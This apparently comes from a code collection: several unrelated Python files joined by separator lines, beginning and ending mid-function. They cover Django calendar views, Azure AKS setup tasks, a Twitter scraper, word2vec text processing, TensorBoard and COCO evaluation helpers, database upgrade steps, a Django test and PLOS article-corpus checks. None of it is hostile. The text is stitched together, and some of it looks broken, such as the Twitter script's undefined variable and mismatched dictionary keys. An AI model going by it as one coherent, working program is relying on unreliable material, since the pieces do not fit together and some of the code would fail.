occurrence = get_object_or_404(Occurrence, id=occurrence_id)
event = occurrence.event
elif None not in (year, month, day, hour, minute, second):
event = get_object_or_404(Event, id=event_id)
date = timezone.make_aware(datetime.datetime(int(year), int(month),
int(day), int(hour), int(minute),
int(second)), tzinfo)
occurrence = event.get_occurrence(date)
if occurrence is None:
raise Http404
else:
raise Http404
return event, occurrence
def check_next_url(next_url):
"""
Checks to make sure the next url is not redirecting to another page.
Basically it is a minimal security check.
"""
if not next_url or '://' in next_url:
return None
return next_url
def get_next_url(request, default):
next_url = default
if OCCURRENCE_CANCEL_REDIRECT:
next_url = OCCURRENCE_CANCEL_REDIRECT
_next_url = request.GET.get('next') if request.method in ['GET', 'HEAD'] else request.POST.get('next')
if _next_url and is_safe_url(url=_next_url, host=request.get_host()):
next_url = _next_url
return next_url
@check_calendar_permissions
def api_occurrences(request):
start = request.GET.get('start')
end = request.GET.get('end')
calendar_slug = request.GET.get('calendar_slug')
timezone = request.GET.get('timezone')
try:
response_data = _api_occurrences(start, end, calendar_slug, timezone)
except (ValueError, Calendar.DoesNotExist) as e:
return HttpResponseBadRequest(e)
return JsonResponse(response_data, safe=False)
def _api_occurrences(start, end, calendar_slug, timezone):
if not start or not end:
raise ValueError('Start and end parameters are required')
# version 2 of full calendar
# TODO: improve this code with date util package
if '-' in start:
def convert(ddatetime):
if ddatetime:
ddatetime = ddatetime.split(' ')[0]
try:
return datetime.datetime.strptime(ddatetime, '%Y-%m-%d')
except ValueError:
# try a different date string format first before failing
return datetime.datetime.strptime(ddatetime, '%Y-%m-%dT%H:%M:%S')
else:
def convert(ddatetime):
return datetime.datetime.utcfromtimestamp(float(ddatetime))
start = convert(start)
end = convert(end)
current_tz = False
if timezone and timezone in pytz.common_timezones:
# make start and end dates aware in given timezone
current_tz = pytz.timezone(timezone)
start = current_tz.localize(start)
end = current_tz.localize(end)
elif settings.USE_TZ:
# If USE_TZ is True, make start and end dates aware in UTC timezone
utc = pytz.UTC
start = utc.localize(start)
end = utc.localize(end)
if calendar_slug:
# will raise DoesNotExist exception if no match
calendars = [Calendar.objects.get(slug=calendar_slug)]
# if no calendar slug is given, get all the calendars
else:
calendars = Calendar.objects.all()
response_data = []
# Algorithm to get an id for the occurrences in fullcalendar (NOT THE SAME
# AS IN THE DB) which are always unique.
# Fullcalendar thinks that all their "events" with the same "event.id" in
# their system are the same object, because it's not really built around
# the idea of events (generators)
# and occurrences (their events).
# Check the "persisted" boolean value that tells it whether to change the
# event, using the "event_id" or the occurrence with the specified "id".
# for more info https://github.com/llazzaro/django-scheduler/pull/169
i = 1
if Occurrence.objects.all().count() > 0:
i = Occurrence.objects.latest('id').id + 1
event_list = []
for calendar in calendars:
# create flat list of events from each calendar
event_list += calendar.events.filter(start__lte=end).filter(
Q(end_recurring_period__gte=start) |
Q(end_recurring_period__isnull=True))
for event in event_list:
occurrences = event.get_occurrences(start, end)
for occurrence in occurrences:
occurrence_id = i + occurrence.event.id
existed = False
if occurrence.id:
occurrence_id = occurrence.id
existed = True
recur_rule = occurrence.event.rule.name \
if occurrence.event.rule else None
if occurrence.event.end_recurring_period:
recur_period_end = occurrence.event.end_recurring_period
if current_tz:
# make recur_period_end aware in given timezone
recur_period_end = recur_period_end.astimezone(current_tz)
recur_period_end = recur_period_end
else:
recur_period_end = None
event_start = occurrence.start
event_end = occurrence.end
if current_tz:
# make event start and end dates aware in given timezone
event_start = event_start.astimezone(current_tz)
event_end = event_end.astimezone(current_tz)
response_data.append({
'id': occurrence_id,
'title': occurrence.title,
'start': event_start,
'end': event_end,
'existed': existed,
'event_id': occurrence.event.id,
'color': occurrence.event.color_event,
'description': occurrence.description,
'rule': recur_rule,
'end_recurring_period': recur_period_end,
'creator': str(occurrence.event.creator),
'calendar': occurrence.event.calendar.slug,
'cancelled': occurrence.cancelled,
})
return response_data
@require_POST
@check_calendar_permissions
def api_move_or_resize_by_code(request):
response_data = {}
user = request.user
id = request.POST.get('id')
existed = bool(request.POST.get('existed') == 'true')
delta = datetime.timedelta(minutes=int(request.POST.get('delta')))
resize = bool(request.POST.get('resize', False))
event_id = request.POST.get('event_id')
response_data = _api_move_or_resize_by_code(
user,
id,
existed,
delta,
resize,
event_id)
return JsonResponse(response_data)
def _api_move_or_resize_by_code(user, id, existed, delta, resize, event_id):
response_data = {}
response_data['status'] = "PERMISSION DENIED"
if existed:
occurrence = Occurrence.objects.get(id=id)
occurrence.end += delta
if not resize:
occurrence.start += delta
if CHECK_OCCURRENCE_PERM_FUNC(occurrence, user):
occurrence.save()
response_data['status'] = "OK"
else:
event = Event.objects.get(id=event_id)
dts = 0
dte = delta
if not resize:
event.start += delta
dts = delta
event.end = event.end + delta
if CHECK_EVENT_PERM_FUNC(event, user):
event.save()
event.occurrence_set.all().update(
original_start=F('original_start') + dts,
original_end=F('original_end') + dte,
)
response_data['status'] = "OK"
return response_data
@require_POST
@check_calendar_permissions
def api_select_create(request):
response_data = {}
start = request.POST.get('start')
end = request.POST.get('end')
calendar_slug = request.POST.get('calendar_slug')
response_data = _api_select_create(start, end, calendar_slug)
return JsonResponse(response_data)
def _api_select_create(start, end, calendar_slug):
start = dateutil.parser.parse(start)
end = dateutil.parser.parse(end)
calendar = Calendar.objects.get(slug=calendar_slug)
Event.objects.create(
start=start,
end=end,
title=EVENT_NAME_PLACEHOLDER,
calendar=calendar,
)
response_data = {}
response_data['status'] = "OK"
return response_data
|
python
|
from invoke import task
from os.path import join, exists
from os import makedirs
from shutil import copy, rmtree
from subprocess import run
from tasks.util.env import (
BIN_DIR,
GLOBAL_BIN_DIR,
KUBECTL_BIN,
AZURE_RESOURCE_GROUP,
AZURE_VM_SIZE,
AKS_CLUSTER_NODE_COUNT,
AKS_CLUSTER_NAME,
)
from tasks.util.version import get_k8s_version
# Note - this must match the version used by Faasm
KNATIVE_VERSION = "0.24.0"
K9S_VERSION = "0.24.15"
# AKS commandline reference here:
# https://docs.microsoft.com/en-us/cli/azure/aks?view=azure-cli-latest
def _run_aks_cmd(name, az_args=None):
cmd = [
"az",
"aks {}".format(name),
"--resource-group {}".format(AZURE_RESOURCE_GROUP),
]
if az_args:
cmd.extend(az_args)
cmd = " ".join(cmd)
print(cmd)
run(cmd, shell=True, check=True)
@task
def list(ctx):
"""
List all AKS resources
"""
_run_aks_cmd("list")
@task
def provision(ctx):
"""
Provision the AKS cluster
"""
k8s_ver = get_k8s_version()
_run_aks_cmd(
"create",
[
"--name {}".format(AKS_CLUSTER_NAME),
"--node-count {}".format(AKS_CLUSTER_NODE_COUNT),
"--node-vm-size {}".format(AZURE_VM_SIZE),
"--kubernetes-version {}".format(k8s_ver),
"--generate-ssh-keys",
],
)
@task
def details(ctx):
"""
Show the details of the cluster
"""
_run_aks_cmd(
"show",
[
"--name {}".format(AKS_CLUSTER_NAME),
],
)
@task
def delete(ctx):
"""
Delete the AKS cluster
"""
_run_aks_cmd(
"delete",
[
"--name {}".format(AKS_CLUSTER_NAME),
"--yes",
],
)
@task
def credentials(ctx):
"""
Get credentials for the AKS cluster
"""
# Set up the credentials
_run_aks_cmd(
"get-credentials",
[
"--name {}".format(AKS_CLUSTER_NAME),
"--overwrite-existing",
],
)
# Check we can access the cluster
cmd = "{} get nodes".format(KUBECTL_BIN)
print(cmd)
run(cmd, shell=True, check=True)
def _download_binary(url, binary_name):
makedirs(BIN_DIR, exist_ok=True)
cmd = "curl -LO {}".format(url)
run(cmd, shell=True, check=True, cwd=BIN_DIR)
run("chmod +x {}".format(binary_name), shell=True, check=True, cwd=BIN_DIR)
return join(BIN_DIR, binary_name)
def _symlink_global_bin(binary_path, name):
global_path = join(GLOBAL_BIN_DIR, name)
if exists(global_path):
print("Removing existing binary at {}".format(global_path))
run(
"sudo rm -f {}".format(global_path),
shell=True,
check=True,
)
print("Symlinking {} -> {}".format(global_path, binary_path))
run(
"sudo ln -s {} {}".format(binary_path, name),
shell=True,
check=True,
cwd=GLOBAL_BIN_DIR,
)
@task
def install_kubectl(ctx, system=False):
"""
Install the k8s CLI (kubectl)
"""
k8s_ver = get_k8s_version()
url = "https://dl.k8s.io/release/v{}/bin/linux/amd64/kubectl".format(
k8s_ver
)
binary_path = _download_binary(url, "kubectl")
# Symlink for kubectl globally
if system:
_symlink_global_bin(binary_path, "kubectl")
@task
def install_kn(ctx, system=False):
"""
Install the knative CLI (kn)
"""
url = "https://github.com/knative/client/releases/download/v{}/kn-linux-amd64".format(
KNATIVE_VERSION
)
binary_path = _download_binary(url, "kn-linux-amd64")
# Symlink for kn command locally
run("rm -f kn", shell=True, check=True, cwd=BIN_DIR)
run("ln -s {} kn".format(binary_path), shell=True, check=True, cwd=BIN_DIR)
# Symlink for kn command globally
if system:
_symlink_global_bin(binary_path, "kn")
@task
def install_k9s(ctx, system=False):
"""
Install the K9s CLI
"""
tar_name = "k9s_Linux_x86_64.tar.gz"
url = "https://github.com/derailed/k9s/releases/download/v{}/{}".format(
K9S_VERSION, tar_name
)
# Download the TAR
workdir = "/tmp/k9s"
makedirs(workdir, exist_ok=True)
cmd = "curl -LO {}".format(url)
run(cmd, shell=True, check=True, cwd=workdir)
# Untar
run("tar -xf {}".format(tar_name), shell=True, check=True, cwd=workdir)
# Copy k9s into place
binary_path = join(BIN_DIR, "k9s")
copy(join(workdir, "k9s"), binary_path)
# Remove tar
rmtree(workdir)
# Symlink for k9s command globally
if system:
_symlink_global_bin(binary_path, "k9s")
|
python
|
import sys
class ModelSearchCriteria:
def __init__(self, datatable_names: [str], column_names: [str], search_text: str ):
self.datatable_names = datatable_names
self.column_names = column_names
self.search_text = search_text
|
python
|
#!/usr/bin/python
# -*- coding: utf_8 -*-
"""Access and query Twitter's API with the simplistic twitter package (`pip install twitter`).
"""
from __future__ import print_function
from __future__ import unicode_literals
import csv
import os
import time
from twitter import OAuth
from twitter import Twitter
def setup_twitter(config_file='config.py'):
"""Setup auth keys and session with Twitter client."""
config = {}
execfile(config_file, config)
twitter_obj = Twitter(auth=OAuth(config["access_key"],
config["access_secret"],
config["consumer_key"],
config["consumer_secret"]))
return twitter_obj
def search_twitter(twitter_session, query, count=100, status='popular'):
"""Submit query to Twitter API via twitter package."""
status_options = ['mixed', 'recent', 'popular']
assert status in status_options, "'status' must be in {}.".format(status_options)
query = twitter_session.search.tweets(q=query,
lang='en',
result=status,
count=count,
retry=True)
return query
def parse_twitter_response(twitter_response, min_rts=500, strip_non_ascii=True):
"""Extract requested variables from Twitter API response. Yield each tweet
one at a time with a generator. Available keys:
[u'contributors', u'truncated', u'text', u'is_quote_status',
u'in_reply_to_status_id', u'id', u'favorite_count', u'source',
u'retweeted', u'coordinates', u'entities', u'in_reply_to_screen_name',
u'in_reply_to_user_id', u'retweet_count', u'id_str', u'favorited',
u'retweeted_status', u'user', u'geo', u'in_reply_to_user_id_str',
u'possibly_sensitive', u'lang', u'created_at',
u'in_reply_to_status_id_str', u'place', u'metadata']
"""
for result in twitter_response['statuses']:
tweet_datetime = result['created_at']
text = result['text'].encode('utf_8')
if strip_non_ascii:
text = ''.join([i if ord(i) < 128 else ' ' for i in text])
# Strip 'RT ' from head of retweets, redundant
if text.startswith('RT '):
text = text[3:]
# Ch newlines to spaces
text = ''.join([' ' if c == '\n' else c for c in text])
rt_count = result['retweet_count']
yield {'_tweet_datetime': tweet_datetime,
'_text': text,
'_rt_count': rt_count}
def search_parse_write_tweets(query_str,
total_to_fetch,
status,
minimum_rts,
low_rt_threshold):
twitter = setup_twitter()
query_response = search_twitter(twitter_session=twitter,
query=query_disjunction,
count=TWEETS_TO_FETCH,
status=status)
print("Search complete ({} seconds)".format(query_response["search_metadata"]["completed_in"]))
tweets_data = parse_twitter_response(query_response, min_rts=minimum_rts) # yields generator
fieldnames = []
if not fieldnames:
for row in tweets_data:
fieldnames = row.keys()
fieldnames_len = len(row.keys())
break
# Set up csv writers
file1 = 'tweets/tweets_popular.csv'
f1_write_header = False
if not os.path.isfile(file1):
f1_write_header = True
csv_popular_open = open(file1, 'ab')
csv_popular_writer = csv.DictWriter(csv_popular_open, delimiter=b'|', fieldnames=fieldnames)
if f1_write_header:
csv_popular_writer.writeheader()
file2 = 'tweets/tweets_not_popular.csv'
f2_write_header = False
if not os.path.isfile(file2):
f2_write_header = True
csv_not_popular_open = open(file2, 'ab')
csv_not_popular_writer = csv.DictWriter(csv_not_popular_open, delimiter=b'|', fieldnames=fieldnames)
if f2_write_header:
csv_not_popular_writer.writeheader()
# Loop thru generator of dicts, write row to right file
for tweet_data in tweets_data:
if tweet_data['rt_count'] >= minimum_rts:
if len(tweet_data.keys()) == fieldnames_len:
csv_popular_writer.writerow(tweet_data)
elif tweet_data['rt_count'] <= low_rt_threshold:
if len(tweet_data.keys()) == fieldnames_len:
csv_not_popular_writer.writerow(tweet_data)
if __name__ == '__main__':
TWEETS_TO_FETCH = 1000
query_string = 'the a u i me she you he they for rt at tweet'.split(' ')
query_disjunction = ' OR '.join(query_string)
#status = 'popular' # ['mixed', 'recent', 'popular']
minimum_rts = 500
low_rt_threshold = 10
while True:
time.sleep(60)
search_parse_write_tweets(query_str=query_disjunction,
total_to_fetch=TWEETS_TO_FETCH,
status='popular',
minimum_rts=minimum_rts,
low_rt_threshold=low_rt_threshold)
search_parse_write_tweets(query_str=query_disjunction,
total_to_fetch=TWEETS_TO_FETCH,
status='mixed',
minimum_rts=minimum_rts,
low_rt_threshold=low_rt_threshold)
|
python
|
import jieba
import jieba.analyse
from gensim.test.utils import get_tmpfile
import gensim.models.word2vec as word2vec
from path import Path
import argparse
from utils import readlines,SeqSubSeq,toarry
#文件位置需要改为自己的存放路径
#将文本分词
parser = argparse.ArgumentParser(description="precess tree file to a doc")
parser.add_argument('--doc', default='./doc6.txt', help="Input file")
parser.add_argument('--doc_post',default='./doc_post.txt',help='output an txt to descripe file_in')
parser.add_argument('--seged_file',default='./conv19_segments.txt')
parser.add_argument('--stop_words_file',default='./stopwords.txt')
parser.add_argument('--model_file',default='./word2vec.model')
parser.add_argument('--node_list_file',default='./array.txt',help='output an txt to descripe file_in')
parser.add_argument('--seq_sub_seq_file',default='./seqsubseq.txt',help='output an txt to descripe file_in')
args = parser.parse_args()
file = Path('./doc_post.txt')
topn = 10
save_model=True
load_model=True
def stopwordslist(filepath):
stopwords = [line.strip() for line in open(filepath, 'r', encoding='utf-8').readlines()]
return stopwords
def preprocess(args):
'''
:param file_name: line_cluster file
:return:
'''
toarry(file_in=args.doc,file_out=args.node_list_file)
SeqSubSeq(file_in = args.node_list_file,file_out=args.seq_sub_seq_file)
file_name = Path(args.seq_sub_seq_file)
if not file_name.exists():
return
seq_sub_seq_file = Path(args.seq_sub_seq_file)
seq_sub_seq = readlines(seq_sub_seq_file)
src_file = Path(args.doc)
lines = readlines(src_file)
ret_line=[]
for line in lines:
ret_line.append(line[2:])
print(ret_line)
post_process_txt=[]
post_pcoess_line=[]
for line_arr in seq_sub_seq:
if line_arr!='':
for num_line in line_arr.split(','):
post_pcoess_line.append(ret_line[int(num_line)])
post_process_txt.append(post_pcoess_line.copy())
post_pcoess_line=[]
doc_post = 'doc_post.txt'
with open(doc_post,'w',encoding='UTF-8') as txt:
txt.write(str(post_process_txt[0] )[1:-1])
for item in post_process_txt[1:]:
txt.write('\n'+str(item)[1:-1])
def Segment(args):
'''
根据停词表, 利用jieba对源文档进行分词
:return: none, 生成txt文件 seg_file
'''
stop_words_file = Path(args.stop_words_file)
seged_file = Path(args.seged_file)
stopwords = stopwordslist(stop_words_file)
outstr=''
with open(file,encoding='utf-8') as f:
document = f.read()
document_cut = jieba.cut_for_search(document)
for word in document_cut:
if word not in stopwords:
if word != '\t':
outstr += word
outstr += " "
with open(seged_file, 'w',encoding="utf-8") as f2:
f2.write(outstr)
def run(args):
seged_file = Path(args.seged_file)
sentences = word2vec.LineSentence(seged_file)
model_file = Path(args.model_file)
if load_model==True and model_file.exists():
model = word2vec.Word2Vec.load("word2vec.model")
else:
model = word2vec.Word2Vec(sentences, hs=3, min_count=5, window=10, size=100)
if save_model == True:
#path = get_tmpfile("word2vec.model") # 创建临时文件
model.save(model_file)
vocabulary = model.wv.similar_by_word('治疗', topn=100)
for key in vocabulary:
print(key)
if __name__=='__main__':
preprocess(args)
Segment(args)
#run(args)
|
python
|
"""functions for working with tensorboard"""
from pathlib import Path
import pandas as pd
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
def logdir2df(logdir):
"""convert tensorboard events files in a logs directory into a pandas DataFrame
events files are created by SummaryWriter from PyTorch or Tensorflow
Parameters
----------
logdir : str, Path
path to directory containing tfevents file(s) saved by a SummaryWriter
Returns
-------
df : pandas.Dataframe
with columns 'step', 'wall_time', and all Scalars from the tfevents file
Notes
-----
adapted from
https://stackoverflow.com/questions/42355122/can-i-export-a-tensorflow-summary-to-csv
"""
if issubclass(type(logdir), Path): # subclass, because could be PosixPath or WindowsPath
logdir = str(logdir)
ea = EventAccumulator(path=logdir)
ea.Reload() # load all data written so far
scalar_tags = ea.Tags()['scalars'] # list of tags for values written to scalar
dfs = {}
for scalar_tag in scalar_tags:
dfs[scalar_tag] = pd.DataFrame(ea.Scalars(scalar_tag),
columns=["wall_time",
"step",
scalar_tag.replace('val/', '')])
dfs[scalar_tag] = dfs[scalar_tag].set_index("step")
dfs[scalar_tag].drop("wall_time", axis=1, inplace=True)
return pd.concat([v for k, v in dfs.items()], axis=1)
def logdir2csv(logdir):
"""convert tensorboard events files in a logs directory into a .csv file
Parameters
----------
logdir : str, Path
path to directory containing tfevents file(s) saved by a SummaryWriter
Returns
-------
None
"""
logdir = Path(logdir)
events_files = sorted(logdir.glob('*tfevents*'))
# remove .csv files -- we can just overwrite them
events_files = [path for path in events_files if not str(path).endswith('.csv')]
if len(events_files) != 1:
if len(events_files) < 1:
raise ValueError(
f'did not find any events files in {logdir}'
)
elif len(events_files) > 1:
raise ValueError(
f'found multiple events files in {logdir}:\n{events_files}.'
'Please ensure there is only one events file in the directory, '
'unclear which to use.'
)
else:
events_file = events_files[0]
df = logdir2df(logdir)
csv_path = events_file.stem + '.csv'
df.to_csv(logdir.joinpath(csv_path))
|
python
|
import json
import logging
import os
from datetime import datetime
def coco_evaluation(dataset, predictions, output_dir, iteration=None):
coco_results = []
for i, prediction in enumerate(predictions):
img_info = dataset.get_img_info(i)
prediction = prediction.resize((img_info['width'], img_info['height'])).numpy()
boxes, labels, scores = prediction['boxes'], prediction['labels'], prediction['scores']
image_id, annotation = dataset.get_annotation(i)
class_mapper = dataset.contiguous_id_to_coco_id
if labels.shape[0] == 0:
continue
boxes = boxes.tolist()
labels = labels.tolist()
scores = scores.tolist()
coco_results.extend(
[
{
"image_id": image_id,
"category_id": class_mapper[labels[k]],
"bbox": [box[0], box[1], box[2] - box[0], box[3] - box[1]], # to xywh format
"score": scores[k],
}
for k, box in enumerate(boxes)
]
)
iou_type = 'bbox'
json_result_file = os.path.join(output_dir, iou_type + ".json")
logger = logging.getLogger("SSD.inference")
logger.info('Writing results to {}...'.format(json_result_file))
with open(json_result_file, "w") as f:
json.dump(coco_results, f)
from pycocotools.cocoeval import COCOeval
coco_gt = dataset.coco
coco_dt = coco_gt.loadRes(json_result_file)
coco_eval = COCOeval(coco_gt, coco_dt, iou_type)
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
result_strings = []
keys = ["AP", "AP50", "AP75", "APs", "APm", "APl"]
metrics = {}
for i, key in enumerate(keys):
metrics[key] = coco_eval.stats[i]
logger.info('{:<10}: {}'.format(key, round(coco_eval.stats[i], 3)))
result_strings.append('{:<10}: {}'.format(key, round(coco_eval.stats[i], 3)))
if iteration is not None:
result_path = os.path.join(output_dir, 'result_{:07d}.txt'.format(iteration))
else:
result_path = os.path.join(output_dir, 'result_{}.txt'.format(datetime.now().strftime('%Y-%m-%d_%H-%M-%S')))
with open(result_path, "w") as f:
f.write('\n'.join(result_strings))
return dict(metrics=metrics)
|
python
|
from snovault import upgrade_step
@upgrade_step('suspension', '1', '2')
def suspension_1_2(value, system):
if 'biosample_ontology' in value:
del value['biosample_ontology']
@upgrade_step('suspension', '2', '3')
def suspension_2_3(value, system):
if 'url' in value:
value['urls'] = [value['url']]
del value['url']
@upgrade_step('suspension', '3', '4')
def suspension_3_4(value, system):
if 'dissociation_time' in value:
value['dissociation_time'] = str(value['dissociation_time'])
|
python
|
# -*- coding: utf-8 -*-
from django.conf.urls import url
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import TestCase, override_settings
from django.views.generic import CreateView, UpdateView, DeleteView, DetailView
class CreateUserView(CreateView):
model = User
fields = '__all__'
class UpdateUserView(UpdateView):
model = User
fields = '__all__'
class DeleteUserView(DeleteView):
model = User
class DetailUserView(DetailView):
model = User
fields = '__all__'
urlpatterns = [
url(r'^create-user/$', view=CreateUserView.as_view(), name='create-user'),
url(r'^update-user/(?P<pk>\d+)/$', view=UpdateUserView.as_view(), name='update-user'),
url(r'^delete-user/(?P<pk>\d+)/$', view=DeleteUserView.as_view(), name='delete-user'),
url(r'^detail-user/(?P<pk>\d+)/$', view=DetailUserView.as_view(), name='detail-user')
]
@override_settings(ROOT_URLCONF='tests.test_django_forms_mixin')
class AccessLogModelFormMixinTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user('testuser', '[email protected]', 'test123.')
self.client.login(username=self.user.username, password='test123.')
def test_create_view_object_is_logged(self):
response = self.client.post(reverse('create-user'), data={
'username': 'another-user',
'email': '[email protected]',
'password': 'test123.'
})
self.assertEqual(response.status_code, 200)
def test_detail_view_object_is_logged(self):
response = self.client.get(reverse('detail-user', kwargs={'pk': self.user.pk}))
self.assertEqual(response.status_code, 200)
|
python
|
"""
This set of functions is for analyzing all the articles in the PLOS corpus. A Jupyter Notebook is provided with
examples of analysis. It can:
* compare the articles indexed in Solr, PMC, and article pages
* spot-check individual JATS fields for irregularities
* create summaries of articles by type, publication date, etc
* generate lists of retracted or corrected articles
"""
import collections
import csv
import os
import random
import requests
from tqdm import tqdm
from .. import get_corpus_dir, newarticledir
from ..plos_regex import (validate_doi, full_doi_regex_match, validate_url, validate_filename)
from ..transformations import (filename_to_doi, doi_to_url)
from ..plos_corpus import (listdir_nohidden, uncorrected_proofs_text_list,
download_updated_xml, get_all_solr_dois,
download_check_and_move)
from ..article import Article
counter = collections.Counter
pmcdir = "pmc_articles"
max_invalid_files_to_print = 100
def validate_corpus(directory=None):
"""
For every local article file and DOI listed on Solr, validate file names, DOIs, URLs in terms of
regular expressions.
Stops checking as soon as encounters problem and prints it
:return: boolean of whether corpus passed validity checks
"""
if directory is None:
directory = get_corpus_dir()
# check DOIs
plos_dois = get_all_plos_dois()
plos_valid_dois = [doi for doi in plos_dois if validate_doi(doi)]
if set(plos_dois) == set(plos_valid_dois):
pass
else:
print("Invalid DOIs: {}".format(set(plos_dois) - set(plos_valid_dois)))
return False
# check urls
plos_urls = [doi_to_url(doi) for doi in plos_valid_dois]
plos_valid_urls = [url for url in plos_urls if validate_url(url)]
if set(plos_urls) == set(plos_valid_urls) and len(plos_valid_urls) == len(plos_valid_dois):
pass
else:
print("Invalid URLs: {}".format(set(plos_urls) - set(plos_valid_urls)))
return False
# check files and filenames
plos_files = listdir_nohidden(directory)
if plos_files:
plos_valid_filenames = [article for article in plos_files if validate_filename(article)]
if len(plos_valid_dois) == len(plos_valid_filenames):
pass
else:
print("Invalid filenames: {}".format(set(plos_valid_dois) - set(plos_valid_filenames)))
return False
plos_valid_files = [article for article in plos_valid_filenames if os.path.isfile(article)]
if set(plos_valid_filenames) == set(plos_valid_files):
return True
else:
invalid_files = set(plos_valid_filenames) - set(plos_valid_files)
if len(invalid_files) > max_invalid_files_to_print:
print("Too many invalid files to print: {}".format(len(invalid_files)))
else:
print("Invalid files: {}".format(invalid_files))
return False
else:
print("Corpus directory empty. Re-download by running create_local_plos_corpus()")
return False
# These functions are for getting the article types of all PLOS articles.
def get_jats_article_type_list(article_list=None, directory=None):
"""Makes a list of of all JATS article types in the corpus
Sorts them by frequency of occurrence
:param article_list: list of articles, defaults to None
:param directory: directory of articles, defaults to get_corpus_dir()
:returns: dictionary with each JATS type matched to number of occurrences
:rtype: dict
"""
if directory is None:
directory = get_corpus_dir()
if article_list is None:
article_list = listdir_nohidden(directory)
jats_article_type_list = []
for article_file in tqdm(article_list):
article = Article.from_filename(article_file, directory=directory)
jats_article_type_list.append(article.type_)
print(len(set(jats_article_type_list)), 'types of articles found.')
article_types_structured = counter(jats_article_type_list).most_common()
return article_types_structured
def get_plos_article_type_list(article_list=None, directory=None):
"""Makes a list of of all internal PLOS article types in the corpus
Sorts them by frequency of occurrence
:param article_list: list of articles, defaults to None
:param directory: directory of articles, defaults to get_corpus_dir()
:returns: dictionary with each PLOS type matched to number of occurrences
:rtype: dict
"""
if directory is None:
directory = get_corpus_dir()
if article_list is None:
article_list = listdir_nohidden(directory)
PLOS_article_type_list = []
for article_file in tqdm(article_list):
article = Article.from_filename(article_file, directory=directory)
PLOS_article_type_list.append(article.plostype)
print(len(set(PLOS_article_type_list)), 'types of articles found.')
PLOS_article_types_structured = counter(PLOS_article_type_list).most_common()
return PLOS_article_types_structured
def get_article_types_map(article_list=None, directory=None):
"""Maps the JATS and PLOS article types onto the XML DTD.
Used for comparing how JATS and PLOS article types are assigned
:param article_list: list of articles, defaults to None
:param directory: directory of articles, defaults to get_corpus_dir()
:returns: list of tuples of JATS, PLOS, DTD for each article in the corpus
:rtype: list
"""
if directory is None:
directory = get_corpus_dir()
if article_list is None:
article_list = listdir_nohidden(directory)
article_types_map = []
for i, article_file in tqdm(article_list):
article = Article.from_filename(article_file)
article.directory = directory
types = [article.type_, article.plostype, article.dtd]
types = tuple(types)
article_types_map.append(types)
return article_types_map
def article_types_map_to_csv(article_types_map):
"""put the `get_article_types_map.()` list of tuples into a csv.
:param article_types_map: output of `get_article_types_map()`
"""
with open('articletypes.csv', 'w') as out:
csv_out = csv.writer(out)
csv_out.writerow(['type', 'count'])
for row in article_types_map:
csv_out.writerow(row)
# These functions are for getting retracted articles
def get_retracted_doi_list(article_list=None, directory=None):
"""
Scans through articles in a directory to see if they are retraction notifications,
scans articles that are that type to find DOIs of retracted articles
:return: tuple of lists of DOIs for retractions articles, and retracted articles
"""
if directory is None:
directory = get_corpus_dir()
retractions_doi_list = []
retracted_doi_list = []
if article_list is None:
article_list = listdir_nohidden(directory)
for art in tqdm(article_list):
article = Article.from_filename(art)
article.directory = directory
if article.type_ == 'retraction':
retractions_doi_list.append(article.doi)
# Look in those articles to find actual articles that are retracted
retracted_doi_list.extend(article.related_dois)
# check linked DOI for accuracy
for doi in article.related_dois:
if bool(full_doi_regex_match.search(doi)) is False:
print("{} has incorrect linked DOI field: '{}'".format(art, doi))
print(len(retracted_doi_list), 'retracted articles found.')
return retractions_doi_list, retracted_doi_list
def get_amended_article_list(article_list=None, directory=None):
"""
Scans through articles in a directory to see if they are amendment notifications,
scans articles that are that type to find DOI substrings of amended articles
:param article: the filename for a single article
:param directory: directory where the article file is, default is get_corpus_dir()
:return: list of DOIs for articles issued a correction
"""
if directory is None:
directory = get_corpus_dir()
amendments_article_list = []
amended_article_list = []
if article_list is None:
article_list = listdir_nohidden(directory)
# check for amendments article type
for art in tqdm(article_list):
article = Article.from_filename(art)
article.directory = directory
if article.amendment:
amendments_article_list.append(article.doi)
# get the linked DOI of the amended article
amended_article_list.extend(article.related_dois)
# check linked DOI for accuracy
for doi in article.related_dois:
if bool(full_doi_regex_match.search(doi)) is False:
print(article.doi, "has incorrect linked DOI:", doi)
print(len(amended_article_list), 'amended articles found.')
return amendments_article_list, amended_article_list
# These functions are for checking for silent XML updates
def create_pubdate_dict(directory=None):
"""
For articles in directory, create a dictionary mapping them to their pubdate.
Used for truncating the revisiondate_sanity_check to more recent articles only
:param directory: directory of articles
:return: a dictionary mapping article files to datetime objects of their pubdates
"""
if directory is None:
directory = get_corpus_dir()
articles = listdir_nohidden(directory)
pubdates = {art: Article.from_filename(art).pubdate for art in articles}
return pubdates
def revisiondate_sanity_check(article_list=None, tempdir=newarticledir, directory=None, truncated=True):
"""
:param truncated: if True, restrict articles to only those with pubdates from the last year or two
"""
if directory is None:
directory = get_corpus_dir()
list_provided = bool(article_list)
if article_list is None and truncated is False:
article_list = listdir_nohidden(directory)
if article_list is None and truncated:
pubdates = create_pubdate_dict(directory=directory)
article_list = sorted(pubdates, key=pubdates.__getitem__, reverse=True)
article_list = article_list[:30000]
try:
os.mkdir(tempdir)
except FileExistsError:
pass
articles_different_list = []
for article_file in tqdm(article_list):
updated = download_updated_xml(article_file=article_file)
if updated:
articles_different_list.append(article_file)
if list_provided:
article_list.remove(article_file) # helps save time if need to restart process
print(len(article_list), "article checked for updates.")
print(len(articles_different_list), "articles have updates.")
return articles_different_list
def check_solr_doi(doi):
'''
For an article doi, see if there's a record of it in Solr.
:rtype: bool
'''
solr_url = 'http://api.plos.org/search?q=*%3A*&fq=doc_type%3Afull&fl=id,&wt=json&indent=true&fq=id:%22{}%22'.format(doi)
article_search = requests.get(solr_url).json()
return bool(article_search['response']['numFound'])
def get_all_local_dois(directory=None):
"""Get all local DOIs in a corpus directory.
:param directory: directory of articles, defaults to get_corpus_dir()
:returns: list of DOIs
:rtype: list
"""
if directory is None:
directory = get_corpus_dir()
local_dois = [filename_to_doi(art) for art in listdir_nohidden(directory)]
return local_dois
def get_all_plos_dois(local_articles=None, solr_articles=None):
'''
Collects lists of articles for local and solr, calculates the difference.
Missing local downloads easily solved by re-running plos_corpus.py.
Missing solr downloads require attention.
:return: every DOI in PLOS corpus, across local and remote versions
'''
if solr_articles is None:
solr_articles = get_all_solr_dois()
if local_articles is None:
local_articles = get_all_local_dois()
missing_local_articles = set(solr_articles) - set(local_articles)
